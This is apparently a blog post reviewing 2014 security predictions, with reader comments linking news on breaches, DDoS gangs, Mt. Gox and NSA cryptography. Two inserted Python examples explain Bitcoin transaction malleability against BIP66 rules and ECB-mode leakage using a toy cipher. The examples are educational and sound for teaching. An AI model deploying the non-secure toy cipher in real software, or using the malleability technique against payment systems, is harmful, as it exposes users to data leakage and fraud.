Industrial systems are gaining the attention of not only security researchers, but also potential attackers. Data obtained from the Open-Source Vulnerability Database (OSVDB) shows that 80% of all ICS vulnerabilities have been disclosed since 2011. Hackers exploit SCADA holes to take full control of critical infrastructure.

Finnish security research firm F-Secure reported on a cyber campaign targeting industrial sectors and the suppliers of equipment to these sectors, including many in critical infrastructure. In late December a German steel factory suffered significant damage after attackers gained unauthorized access to computerized systems that help control its blast furnace: one of the plant’s blast furnaces could not be shut down in a controlled manner, which resulted in “massive damage to plant”. The incident is notable because it’s one of the few computer intrusions to cause physical damage.

New details also emerged suggesting that some earlier damaging incidents could have been the result of cyber-attacks. The Stuxnet worm that targeted Iran’s uranium enrichment program has been dubbed the world’s first digital weapon, destroying an estimated 1,000 centrifuges. Bloomberg News reported that a fiery blast in 2008 that hit a Turkish oil pipeline was the result of hacking. The suspected sabotage of a Siberian pipeline in 1982 is believed to have used a logic bomb.

The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve, and as the systems become more widely used, more security issues will be found in them.

The Internet of Things was expanding very rapidly in 2014. The focus was on getting the things running. Many of the applications were so new that there have not been any very large-scale issues yet. I expect IoT security issues to come more into the spotlight in 2015.

Cloud security will be talked about. Hopefully there will be some clearing-up of the terminology in that area, because cloud security can mean a lot of things, like the term cloud computing. Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years, from $2.1 billion in the past year to $3.1 billion in 2015.

Let’s see next year how the numbers add up.

Marketers try to put the “cloud” term into security product brochures as much as they can. Cloud has made traditional information security sound old-fashioned, because companies are under pressure to move services to the cloud. Mobile devices and dispersed users also set new requirements for information security.

Yes. Security marketers used the cloud security term a lot in their material.

In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.

The Cyber Security Center performed its tasks in 2014.

Crypto-currencies like Bitcoin and similar are on the rise. Early adopters already use them actively. Those crypto-currencies have many security issues related to them. The values of the crypto-currencies vary quite a lot, and the value easily drops considerably when they get so widely used that different governments try to limit their use. Bitcoin is increasingly used as a ransomware payment method. Quite a lot of Bitcoins have been stolen lately (and I expect that to increase as usage increases); they are stolen from users, on-line wallets and exchanges. When more money is involved, more bad guys try to get in to take some of it.

Year 2014 was a huge year for Bitcoin, in good and bad. The alternative currency has been plagued by hacks, Ponzi schemes and increasingly professional thefts since 2011, but 2014 was really special. There were many gains in the wider use of Bitcoin, even to the point that Microsoft quietly added Bitcoin as a payment method for digital content.

On the other side there were also many cyberattacks that stole lots of Bitcoins, and Bitcoins were used by ransomware makers. In February 2014 the world’s leading Bitcoin exchange, Mt. Gox, declared bankruptcy, claiming that hackers had exploited a technical issue called “transaction malleability” to steal 750,000 bitcoins ($400 million). It is hard to say whether that’s what really happened or not. The next month Flexcoin, the Canada-based Bitcoin bank, closed after losing $600,000 in a hacker attack. Other cryptocurrencies were attacked by hackers too, for example hackers stole $1.65 million in NXT from the BTER exchange.
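Transaction malleability, in the sense Mt. Gox cited, is this: a Bitcoin transaction’s id is the hash of its serialized bytes, signature included, and nodes of the time accepted several DER encodings of the same ECDSA signature (OpenSSL’s parser was lax), so a third party could re-encode the signature in a transaction it saw and relay a still-valid copy with a different txid. An exchange that tracked withdrawals by txid alone would then see its own payment “fail” and might pay again. The following is an added example, not from the original post or from Bitcoin Core: a Python model with a simplified transaction layout and placeholder r and s values (not a real signature over anything), showing that a non-minimal integer encoding changes the id, and that the BIP66 strict-DER rules, which the network adopted afterwards, reject the re-encoded signature.

```python
import hashlib
import struct

def sha256d(b: bytes) -> bytes:
    """Bitcoin's transaction id is the double SHA-256 of the serialized transaction."""
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()

def der_int(n: int, pad: bool = False) -> bytes:
    """DER INTEGER. pad=True inserts a needless leading 0x00: same number, different bytes.
    Pre-BIP66 nodes accepted this (lax OpenSSL parsing); that is the malleability."""
    body = n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80 or pad:
        body = b"\x00" + body
    return bytes([0x02, len(body)]) + body

def der_sig(r: int, s: int, sighash: int = 0x01, pad_r: bool = False) -> bytes:
    """SEQUENCE { INTEGER r, INTEGER s } followed by the sighash type byte."""
    seq = der_int(r, pad_r) + der_int(s)
    return bytes([0x30, len(seq)]) + seq + bytes([sighash])

def serialize_tx(prev_txid: bytes, prev_index: int, script_sig: bytes,
                 value_satoshi: int, script_pubkey: bytes) -> bytes:
    """One-input, one-output transaction in a Bitcoin-like layout (simplified for the
    example: enough structure to show that the signature bytes feed into the txid)."""
    return (struct.pack("<I", 1)                                # version
            + b"\x01" + prev_txid + struct.pack("<I", prev_index)
            + bytes([len(script_sig)]) + script_sig
            + struct.pack("<I", 0xFFFFFFFF)                     # sequence
            + b"\x01" + struct.pack("<Q", value_satoshi)
            + bytes([len(script_pubkey)]) + script_pubkey
            + struct.pack("<I", 0))                             # locktime

def is_strict_der(sig: bytes) -> bool:
    """BIP66 encoding rules (sig includes the trailing sighash byte)."""
    n = len(sig)
    if n < 9 or n > 73:
        return False
    if sig[0] != 0x30 or sig[1] != n - 3:
        return False
    len_r = sig[3]
    if 5 + len_r >= n:
        return False
    len_s = sig[5 + len_r]
    if len_r + len_s + 7 != n:
        return False
    if sig[2] != 0x02 or len_r == 0 or sig[4] & 0x80:
        return False
    if len_r > 1 and sig[4] == 0x00 and not (sig[5] & 0x80):
        return False                                  # excess padding on r
    if sig[len_r + 4] != 0x02 or len_s == 0 or sig[len_r + 6] & 0x80:
        return False
    if len_s > 1 and sig[len_r + 6] == 0x00 and not (sig[len_r + 7] & 0x80):
        return False                                  # excess padding on s
    return True

# Placeholder values for the example: r and s are not a real signature, the key and
# scripts are filler bytes. Only the encoding behaviour matters here.
R = 0x5e1f3c7a9b2d4e6f8a0c1d3e5f7a9b2c4d6e8f0a1b3c5d7e9f0a2b4c6d8e0f12
S = 0x7a3b5c7d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
PUBKEY = b"\x02" + b"\x11" * 32
PREV_TXID = b"\xaa" * 32
SCRIPT_PUBKEY = b"\x00\x14" + b"\x22" * 20

def script_sig(sig: bytes) -> bytes:
    """PUSH sig, PUSH pubkey, as in a pay-to-pubkey-hash spend."""
    return bytes([len(sig)]) + sig + bytes([len(PUBKEY)]) + PUBKEY

def demo():
    original = der_sig(R, S)
    malleated = der_sig(R, S, pad_r=True)   # same r and s: verifies under the old lax rules
    txid_a = sha256d(serialize_tx(PREV_TXID, 0, script_sig(original), 50000, SCRIPT_PUBKEY))
    txid_b = sha256d(serialize_tx(PREV_TXID, 0, script_sig(malleated), 50000, SCRIPT_PUBKEY))
    return {
        "same_txid": txid_a == txid_b,             # False: a txid lookup for the payment fails
        "original_strict": is_strict_der(original),
        "malleated_strict": is_strict_der(malleated),
    }

if __name__ == "__main__":
    print(demo())
```

Strict DER closes only this encoding channel; the other third-party variant, replacing s by n minus s, was handled by the low-S rule. Neither fixes the operational lesson: a payer should track whether the inputs it spent were consumed, not whether a particular txid confirmed.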

In November the Bitcoin Foundation said that Bitcoin is GREAT and SAFE. Bitcoin will have its biggest impact in unstable regimes and foreign currency transfers, according to the Bitcoin Foundation’s chief scientist Gavin Andresen. The Foundation works on keeping transaction fees inexpensive. Besides Bitcoin there are also many other smaller cryptocurrencies.

The world is looking for a virtual currency. Virtual means that the currency is not backed by a physical commodity, is not controlled by a government agency either, and is used and accepted among members of a specific virtual community (that is, the Internet). Today, enthusiasts of virtual currencies fall into two camps.

The first camp contains the crypto-currency enthusiasts, whose idea has had lots of publicity: there are now 80 virtual currencies, all based off of Bitcoin, with names like Dogecoin, Altcoin and Primecoin. Of these, Bitcoin has the vast majority of mindshare and user base (at less than 1 million users).

The second camp of virtual currency enthusiasts is largely unknown, which is surprising considering that there are over 30 million of them: ordinary people in Africa using an SMS text-based currency called M-Pesa. The driving forces behind Bitcoin and M-Pesa are completely different. The M-Pesa phenomenon is a product of a unique regulatory environment. Creating a flexible but safe regulatory space made the difference in Kenya and Tanzania. Kenya has become the paragon of mobile money. Today, more than two-thirds of Kenyans use M-Pesa. Mobile money has lagged in India and Nigeria, both of which are known for their more complex bureaucracies. Clearly the message here is that mobile money is a long game, and most bitcoin startups accept this applies to them too. Research shows that there is clear demand for faster, cheaper and more transparent financial services.

 

23 Comments

  1. Tomi Engdahl says:

    List of cyber attacks and data breaches in 2014
    http://www.itgovernance.co.uk/blog/list-of-the-hacks-and-breaches-in-2014/?utm_source=social&utm_medium=reddit

    look back on some of the more prominent hacks and data breaches of 2014

    Reply
  2. Tomi Engdahl says:

    Three things that we should be satisfied with:

    1. Finland is still regarded as a safe country, with clean communication networks and workstations in addition to its clean nature, and it can also provide secure data centers in many ways.

    2. Cyber criminals have not struck our bank or payment systems in Finland in the same way, especially compared to the United States! Sure, we must regularly read news about various add-on devices for both banking and payment machines being abused, and about scam campaigns for on-line banking user information and other information, but in this regard we have learned to work safely.

    3. The mobile world is staying fairly clean. Although the number of malware families in the Android ecosystem in particular is rampant, the mobile terminal has been able to remain moderately reliable.

    Source: http://www.tivi.fi/blogit/turvasatama/tietoturvakatsaus+2014++huonolta+nayttaa/a1038564

    Reply
  3. Tomi Engdahl says:

    Ideology Vs Reality
    Some people say that I’m just being an idealist and am disconnected from the realities of the world with this discussion. That in the “real” world there are tradeoffs that need to be made. That in the “real” world it’s not a black-and-white discussion.

    Well, let’s look at this “real” world:

    Sony – Seemingly all data on network leaked. Including social security numbers of 47,000 employees.
    Ebay – 145 million records leaked.
    Target – 40 million credit card numbers leaked. 70 million contact details.
    Home Depot – 56 million credit card numbers leaked. 53 million email addresses.
    Goodwill Industries – 868,000 credit card numbers
    JP Morgan – 7 million contact details
    Neiman Marcus – 350,000 credit card numbers
    Michaels – 2.6 million credit card numbers.

    And that’s just the big ones for 2014 so far.

    It’s been reported that there were 761 major breaches in 2014 alone. Exposing well over 83 million records (only counting confirmed records, not including unconfirmed numbers like Ebay). And those are just the major ones.

    That doesn’t touch the 100,000+ WordPress sites breached in November. Or the millions of sites hit by the Drupal SQL vulnerability.

    The reality is quite grim. Perhaps if others were a bit more “idealist”, this world would be a lot safer.

    Source: http://blog.ircmaxell.com/2014/12/being-responsible-developer.html

  4. Tomi Engdahl says:

    Jon Southurst / CoinDesk:
    Japanese police suspect 99% of bitcoins missing from Mt. Gox are due to internal system manipulation, not hack

    Missing Mt Gox Bitcoins Likely an Inside Job, Say Japanese Police
    http://www.coindesk.com/missing-mt-gox-bitcoins-inside-job-japanese-police/

    Blame for 99% of the bitcoins missing from Mt Gox falls on internal system manipulation and not any external attack, a major Japanese newspaper has claimed.

    Citing an unnamed source connected to the ongoing police investigation, Japan’s Yomiuri Shimbun newspaper led with the story on the front page of its New Year’s Day edition. It said that only 7000 BTC, or 1% of the total 650,000 missing, could be attributed to hacking attacks from outside the company.

    That a company insider might have been responsible for the theft of 650,000 BTC from Mt Gox has been whispered about for some time, though no-one in particular has been named as a suspect, even unofficially.

    Mt Gox had no full-time staff other than CEO Mark Karpeles, employing a series of contractors on temporary work arrangements.

  5. Tomi Engdahl says:

    Hackers ‘leak details of 13k users of PlayStation, Xbox and Amazon’
    http://www.telegraph.co.uk/news/worldnews/11314805/Hackers-leak-details-of-13k-users-of-PlayStation-Xbox-and-Amazon.html

    Hackers who say they are affiliated to Anonymous, the shadowy anarchist hacking collective, release document ‘containing passwords and credit card numbers’

    A gang of internet hackers claims it has leaked personal details of more than 13,000 users of PlayStation, Xbox and sites including Amazon in what appears to be the latest high-profile breach of internet security in recent weeks.

    The hackers – who say they are affiliated to Anonymous, the shadowy anarchist hacking collective – released a document containing username and password combinations, with credit card numbers and expiry dates added later.

    Microsoft’s Xbox games console, Sony’s PlayStation equivalent, and online gaming site Twitch.tv were among the main targets of the hack, the Dailydot.com website reported. Other reported targets include Walmart, the US supermarket giant, Amazon, Dell, computer games including The Sims 3 and Dragon Age: Origins and a host of porn sites.

  6. Tomi Engdahl says:

    Lizard Kids: A Long Trail of Fail
    http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/

    The Lizard Squad, a band of young hooligans that recently became Internet famous for launching crippling distributed denial-of-service (DDoS) attacks against the largest online gaming networks, is now advertising its own Lizard-branded DDoS-for-hire service. Read on for a decidedly different take on this offering than what’s being portrayed in the mainstream media.

    The new service, lizardstresser[dot]su, seems a natural evolution for a group of misguided youngsters that has sought to profit from its attention-seeking activities.

    The Lizard kids only ceased their attack against Sony’s Playstation and Microsoft’s Xbox Live networks last week after MegaUpload founder Kim Dotcom offered the group $300,000 worth of vouchers for his service in exchange for ending the assault.

    The group is advertising the new “booter service” via its Twitter account, which has some 132,000+ followers. Subscriptions range from $5.99 per month for the ability to knock a target offline for 100 seconds at a time, to $129.99 monthly for DDoS attacks lasting more than eight hours.

    In a show of just how little this group knows about actual hacking and coding, the source code for the service appears to have been lifted in its entirety from titaniumstresser, another, more established DDoS-for-hire booter service.

    These two services, like most booters, are hidden behind CloudFlare, a content distribution service that lets sites obscure their true Internet address.

    LizardSquad and Darkode are practically synonymous and indistinguishable now.

    It’s worth noting that the individual who registered LizardStresser is an interesting and angry teenager who appears to hail from Australia

  7. Tomi Engdahl says:

    Lizard Squad Member Vinnie Omari Arrested After Christmas DDoS Attacks
    Is the whole house collapsing?
    http://www.craveonline.com/gaming/articles/805559-lizard-squad-member-vinnie-omari-arrested-christmas-ddos-attacks

    A 22-year-old male that goes by the alias ‘Twickenham’ has just been arrested following a raid on his home in Thames Valley, U.K. Officials claim that he had been stealing funds from PayPal accounts for more than a year.

    What makes this arrest particularly interesting is that the name of the arrested individual lines up with one of the names listed on KrebsOnSecurity‘s report including members of the DDoS group Lizard Squad.

    Previously, no members of Lizard Squad have been arrested. However, the FBI has confirmed its investigation of the group after costly attacks during the week of Christmas that rendered Xbox Live and PlayStation Network nearly inoperable during the most important days of the year.

    Who’s in the Lizard Squad?
    http://krebsonsecurity.com/2014/12/whos-in-the-lizard-squad/

    Member2, the guy that does most of the talking in the BBC interview, appears to be a 22-year-old from the United Kingdom named Vinnie Omari. Sky News ran an on-camera interview with Omari on Dec. 27, quoting him as a “computer security analyst” as he talks about the attacks by LizardSquad and their supposed feud with a rival hacker gang.

    Sources say Kivimäki was arrested by Helsinki police in October 2013 on suspicion of running a huge botnet consisting of more than 60,000 hacked Web servers around the world. Local Finnish media reported on the youth’s arrest, although they didn’t name him. Kivimäki, 16, also was reportedly found in possession of more than 3,000 stolen credit cards.

  8. Tomi Engdahl says:

    That Spiegel NSA story is activist nonsense
    http://blog.erratasec.com/2014/12/that-spiegel-nsa-story-is-nonsense.html#.VKaEe3t3B-s

    Yet again activists demonstrate they are less honest than the NSA. Today, Der Spiegel has released more documents about the NSA. They largely confirm that the NSA is actually doing, in real-world situations, what we’ve suspected they can do. The text of the article describing these documents, however, wildly distorts what the documents show. A specific example is a discussion of something called “TUNDRA”.

    TUNDRA was an undergraduate student project, as the original document makes clear, not some super-secret government program into cryptography. The purpose of the program is to fund students and find recruits, not to create major new advances in cryptography.

    The Spiegel article correctly says that the “agency is actively looking for ways to break the very standard it recommends”, and it’s obvious from context that the Spiegel is implying this is a bad thing. But it’s a good thing, as part of the effort in improving encryption. You secure things by trying to break them. That’s why this student project was funded by the IAD side of the NSA — the side dedicated to improving cryptography. Most of us in the cybersecurity industry are trying to break things — we only trust things that we’ve tried to break but couldn’t.

    The Spiegel document talks about AES, but it’s not AES being attacked. Instead, it’s all block ciphers in “electronic codebook” modes that are being attacked. The NSA, like all cryptographers, recommends that you don’t use the basic “electronic codebook” mode, because it reveals information about the encrypted data

    The NSA already has ways of attacking ECB mode

    Journalism is supposed to be different from activism. Journalists are supposed to be accurate and fair, to communicate rather than convince. The activist has the opposite goal, to convince the reader, even if that means exploiting misinformation.

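The ECB point in the comment above is easy to see in code: in electronic codebook mode every block is encrypted independently, so equal plaintext blocks produce equal ciphertext blocks and the ciphertext reveals the structure of the data even though no key is recovered. The following is an added example, not code from the Errata Security post or from the Spiegel documents. A small Feistel network stands in for AES (an assumption made so the script runs offline with only the standard library); the leak it demonstrates belongs to the mode, not to the cipher underneath, and the counts are the same with real AES.

```python
"""Added example: why ECB mode leaks structure, and how to spot it.

A toy Feistel block cipher stands in for AES (assumption: not a real cipher,
never use it for real data).  ECB and CBC are built on top of it, a sample
record with repeated blocks is encrypted both ways, and repeated_blocks()
counts the duplicate ciphertext blocks that give ECB away.
"""
import hashlib

BLOCK = 16   # 128-bit blocks, the same size as AES
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function: keyed hash of the half-block, truncated to 8 bytes.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy Feistel cipher: a keyed permutation on 16-byte blocks (stand-in for AES)."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    """Inverse of block_encrypt: same rounds in reverse order."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Each block encrypted on its own: equal plaintext blocks -> equal ciphertext blocks.
    return b"".join(block_encrypt(key, b) for b in blocks(pkcs7_pad(plaintext)))


def ecb_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    return pkcs7_unpad(b"".join(block_decrypt(key, b) for b in blocks(ciphertext)))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Each block is XORed with the previous ciphertext block before encryption,
    # so repeated plaintext blocks no longer produce repeated ciphertext blocks.
    out, prev = [], iv
    for b in blocks(pkcs7_pad(plaintext)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return iv + b"".join(out)


def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    iv, body = ciphertext[:BLOCK], ciphertext[BLOCK:]
    out, prev = [], iv
    for b in blocks(body):
        out.append(_xor(block_decrypt(key, b), prev))
        prev = b
    return pkcs7_unpad(b"".join(out))


def repeated_blocks(ciphertext: bytes) -> int:
    """How many ciphertext blocks duplicate an earlier block.
    Any non-zero count on a ciphertext is the classic ECB tell."""
    bs = blocks(ciphertext)
    return len(bs) - len(set(bs))


# Constructed sample record: two 16-byte fields, each followed by six identical
# zero blocks (padded fixed-width fields, image rows and similar data look like this).
SAMPLE = (b"ACCOUNT=12345678" + b"\x00" * BLOCK * 6
          + b"BALANCE=00000001" + b"\x00" * BLOCK * 6)


def demo(key: bytes = b"k" * 16, iv: bytes = b"\x01" * 16) -> dict:
    """Encrypt SAMPLE under ECB and CBC and count duplicate ciphertext blocks."""
    ecb = ecb_encrypt(key, SAMPLE)
    cbc = cbc_encrypt(key, iv, SAMPLE)
    assert ecb_decrypt(key, ecb) == SAMPLE and cbc_decrypt(key, cbc) == SAMPLE
    return {"ecb_repeats": repeated_blocks(ecb), "cbc_repeats": repeated_blocks(cbc)}


if __name__ == "__main__":
    print(demo())   # the twelve zero blocks show up as 11 repeats under ECB, 0 under CBC
```

Because the cipher is a permutation for a fixed key, the eleven repeats under ECB are exact, not statistical: twelve identical zero blocks can only map to twelve identical ciphertext blocks. That is the information ECB "reveals about the encrypted data", and it is why `repeated_blocks` (the same heuristic used to detect ECB in black-box oracle tests) works with any block cipher, AES included.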
  9. Tomi Engdahl says:

    Ask a nerd
    http://blog.erratasec.com/2014/12/ask-nerd.html#.VKaF0Ht3B-s

    One should probably consult a lawyer on legal questions. Likewise, lawyers should probably consult nerds on technical questions. I point this out because of this crappy Lawfare post. It’s on the right side of the debate (FBI’s evidence pointing to North Korea is bad), but it’s still crap.

    For example, it says: “One hears a lot in cybersecurity circles that the government has “solved” the attribution problem”. That’s not true, you hear the opposite among cybersecurity experts. I suspect he gets this wrong because he’s not talking about technical experts, but government circles. What government types in Washington D.C. say about cybersecurity is wholly divorced from reality — you really ought to consult technical people.

  10. Tomi Engdahl says:

    The FBI’s North Korea evidence is nonsense
    http://blog.erratasec.com/2014/12/the-fbis-north-korea-evidence-is.html#.VKaGInt3B-s

    The FBI has posted a press release describing why they think it’s North Korea. While there may be more things we don’t know, on its face it’s complete nonsense. It sounds like they’ve decided on a conclusion and are trying to make the evidence fit. They don’t use straightforward language, but confusing weasel words, like saying “North Korea actors” instead of simply “North Korea”. They don’t give details.

    The reason it’s nonsense is that the hacker underground shares code. They share everything: tools, techniques, exploits, owned-systems, botnets, and infrastructure. Different groups even share members. It is implausible that North Korea would develop its own malware from scratch.

    Update on Sony Investigation
    http://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation

  11. Tomi Engdahl says:

    Top Cybersecurity Headlines of 2014
    http://www.securityweek.com/top-cybersecurity-headlines-2014

    1) Point-of-sale (PoS) security
    2) Heartbleed Vulnerability
    3) Shellshock:
    4) Target Breach Fallout
    5) Sony

  12. Tomi Engdahl says:

    Emily Yoshida / The Verge:
    In a future fueled by hacks and leaks, will we be sedated by our own transparency?

    Nothing to see here
    http://www.theverge.com/2014/12/31/7475193/hack-leak-transparency-outrage-thinkpiece-hot-take-economy-2014

    In a future fueled by hacks and leaks, will we be sedated by our own transparency?

    The word “unprecedented” was used a lot, whether to describe the case of surveillance footage of Ray Rice knocking out his then-fiancée, or this summer’s celebrity nude photo leak, or the hydra-headed nightmare of the Sony debacle. That continually acknowledged unknown territory should be a signal to us that we are in the middle of a period of rapid growth — or decay, depending on your point of view. The things we weren’t supposed to see grossly violated our commonly accepted standards for individual privacy; they also galvanized us and fueled conversations that may have otherwise been swept under the rug.

    Increasingly the story is not that a hack or leak happened, but rather what information was leaked and who stands to be hurt / ridiculed / financially affected by it. The Sony hacks happened in the middle of a veritable wave of cybersecurity fails — the US Postal Service, the Sands Casino, and Madonna were all subject to some kind of breach in 2014. Some of these stories were drowned out by the total news cycle domination of the Sony leak, but we have also become increasingly comfortable with the idea that these things happen. In the popular narrative, security breaches are being talked about less and less as crimes and more and more like inevitable glitches in our infinite series of tubes. Hacks are now just one of the many ways we get information: sometimes a tube breaks and candy starts falling out for a few seconds for whoever happens to be nearby. We’re starting to expect this as a natural part of life on Earth; like thunderstorms or earthquakes.

    On some level, we suspect we are moving towards a future where we can see inside every window all the time; a future where everyone’s medical records are publicly available, where we know what everyone looks like naked, whether they’re famous or not. But how will we expect ourselves and others to behave in that future, especially once we get used to it? Our actions and words, in tandem with the way we monitor them, are being held to a rapidly evolving standard. We’ll know more about what our neighbors do in private — sexual proclivities, how we choose to entertain ourselves — but it will take a lot more to shock us. There is a potentially utopian bent to all this: once everything is known, maybe everything will be accepted. The erosion of the individual’s private life could be a symptom of a more tolerant, open-minded society.

    But what about situations where we should get mad? In 2014 we got mad on the internet about a lot of things we saw, many of which we saw on the internet, many of which we wouldn’t have been able to see without the internet, many of which we were very justified in our anger over.

    To grow weary of the outrage cycle is totally understandable — I am, emphatically, and I think more and more people will be in the coming year.

    At my most pessimistic, it’s hard not to hear each successive internet outrage as a dying tone ringing in our ears for the last time after yet another deafening blow to our trust in the essential goodness of the world.

    The logic goes that transparency makes everyone accountable. That the distribution of as much information as possible naturally leads to a society-wide system of checks and balances. This was an argument for the public airing of some of the more vitriolic emails from the Sony leak

    The anticlimactic answer is probably that we wait. The internet and its transparency and outrage are both younger and faster than the people currently in charge of our movie studios and police departments.

    An inevitable side effect of seeing more things, it seems, is finding more things boring.

  13. Tomi Engdahl says:

    Zero-day hacking group resorts to UNICORN SMUT-SLINGING
    Playboy ploy not beneath APT3
    26 Nov 2014
    http://www.theregister.co.uk/2014/11/26/zeroday_group_degenerates_into_unicorn_smut_slinging/

    Sysadmins who have not yet patched their Windows boxes against the 18-year-old “unicorn-like” OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks.

    The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers.

    That group had begun spewing spear-phishing emails targeting two vulnerabilities (CVE-2014-6332, CVE-2014-4113) disclosed this month and in October respectively.

    “The use of CVE-2014-6332 is notable, as it demonstrates that multiple classes of actors, both criminal and APT alike, have now incorporated this exploit into their toolkits,” they said in an advisory.

  14. Tomi Engdahl says:

    State of Bitcoin 2015: Ecosystem Grows Despite Price Decline
    http://www.coindesk.com/state-bitcoin-2015-ecosystem-grows-despite-price-decline/

    CoinDesk is pleased to announce the latest quarterly State of Bitcoin report, featuring a 2014 Year in Review, an in-depth analysis of data and events from the fourth quarter of 2014 and a look ahead to what 2015 might bring.

    Overall, 2014 could be characterized as a ‘Tale of Two Bitcoins’.

    On the one hand, significant bitcoin venture investment continued and much progress was made in furthering adoption, particularly in bitcoin payment acceptance by big brand names such as Microsoft and Dell.

    On the other hand, early on in 2014, the collapse of Mt Gox dealt a crippling blow to bitcoin’s extraordinary price momentum.

    All-time bitcoin startup VC investment crosses $400 million

  15. Tomi Engdahl says:

    The Real Story Behind the Kate Upton Nude DDoS Attack
    http://www.securityweek.com/real-story-behind-kate-upton-nude-ddos-attack

    I recently heard about an interesting DDoS story in New Zealand involving the nude selfies of cover girl Kate Upton and Hunger Games star Jennifer Lawrence. The photos were stolen from Apple’s iCloud service. The story seemed like the perfect, illustrative fable about everything that is wrong with Internet security today. It had all the classic buzzwords: cloud security, malware, DDoS, Apple, 4chan, and lazy, lustful Internet users.

    [Image: Kate Upton Photos Crash the Internet]

    But while parts of the story were true, others…not so much.

    The first third of the story is more or less true; the personal data of the celebrities was indeed exfiltrated from iCloud. Apple claims that it was due to the weak iCloud passwords used by the celebs themselves, but that explanation is just semantics. If you read an EULA carefully (many of them 25 pages or more), you will find that you personally are responsible for the security of your data in the cloud. That’s the state of cloud security today.

    The middle part of the story is true as well: nearly every site hosting the celebrity photos was also hosting some kind of malware.

    Ultimately, it turned out to be sheer coincidence that the attack happened in the days just after the iCloud breach. The media was so taken with the idea that Kate Upton nude photos had caused a DDoS attack that they just took the story and ran with it. It’s not difficult to understand why

  17. Tomi Engdahl says:

    2014: A Monumental Year for Cyber Attacks
    http://www.eetimes.com/author.asp?section_id=36&doc_id=1325433&

    As consumer and industrial IoT adoption rises, so does the risk for cyber-attacks. Here’s what happened in 2014, as a reminder and warning.

    In every single month in 2014, the cyber world experienced an attack that would have made the top-three list in any previous year. The numbers were stunning all year long: 56 million hacked at Home Depot, 76 million at JP Morgan Chase. Target, K-Mart, UPS, and the year’s most colorful attack — Sony Pictures Entertainment — all got hit.

    The Sony Pictures Entertainment hack grabbed so much cyber ink, nobody noticed that the company’s PlayStation network was attacked — yet again — in early December, creating a system-wide outage. This month-by-month list is mind-numbing. And we left off the small hacks that only affected a few hundred thousand users.

  18. Tomi Engdahl says:

    The State of Email Trust 2014 Report
    http://info.agari.com/state-of-email-trust-2014.html

    As you saw in the headlines and news, 2014 was a big year for email threats.
    And from our findings – the proof is in the data.

    By summarizing the TrustIndex data we gathered quarterly in 2014 that measures how well both individual companies and industries as a whole are protecting their customers from email cyberattacks, we saw that email security improved somewhat in 2014, but most companies still haven’t implemented technology that protects them from cybercrime.

  19. Tomi Engdahl says:

    Don’t be fooled! He’s not from the IT crowd… he’s a CYBERSPY – FireEye
    Is that Tom the techie or a Chinese spear-phisherman?
    http://www.theregister.co.uk/2015/02/24/fireeye_threat_report/

    Impersonating IT departments in spear-phishing attacks is becoming an increasingly popular tactic among hackers, particularly in cyber-espionage attacks.

    IT staff themed phishing emails comprised 78 per cent of observed phishing schemes picked up by FireEye in 2014, compared to just 44 per cent in 2013.

    The sixth annual FireEye Mandiant M-Trends report, published on Tuesday, reports that organisations are getting slightly speedier at picking up trespassers in their network. Breach detection times dropped from 229 days in 2013 to 205 days last year. The slight improvement still means that successful hacker attacks remain undetected for months.

    In some cases breaches can go undetected for years.

    Hackers are adopting more sophisticated and stealthy tactics.

    More details can be found in the 2015 Mandiant M-Trends report
    https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

  20. Tomi Engdahl says:

    HP: 10 most common security issues in 2014 were from code over two years old
    … and sometimes dating back decades
    http://www.theinquirer.net/inquirer/news/2396783/hp-10-most-common-security-issues-in-2014-were-from-code-over-two-years-old

    NEARLY HALF of all security breaches come from vulnerabilities that are between two and four years old, according to this year’s HP Cyber Risk Report entitled The Past Is Prologue.

    The annual report found that the most prevalent problems came as a result of server misconfiguration, and that the primary causes of commonly exploited software vulnerabilities are defects, bugs and logic flaws.

    But perhaps most disturbing of all was the news that Internet of Things (IoT) devices and mobile malware have introduced a significant extra security risk.

    The entire top 10 vulnerabilities exposed in 2014 came from code written years, and in some cases decades, previously.

    “Many of the biggest security risks are issues we’ve known about for decades, leaving organisations unnecessarily exposed,” said Art Gilliland, senior vice president and general manager for enterprise security products at HP.

    “We can’t lose sight of defending against these known vulnerabilities by entrusting security to the next silver bullet technology. Rather, organisations must employ fundamental security tactics to address known vulnerabilities and, in turn, eliminate significant amounts of risk.”

  21. Tomi Engdahl says:

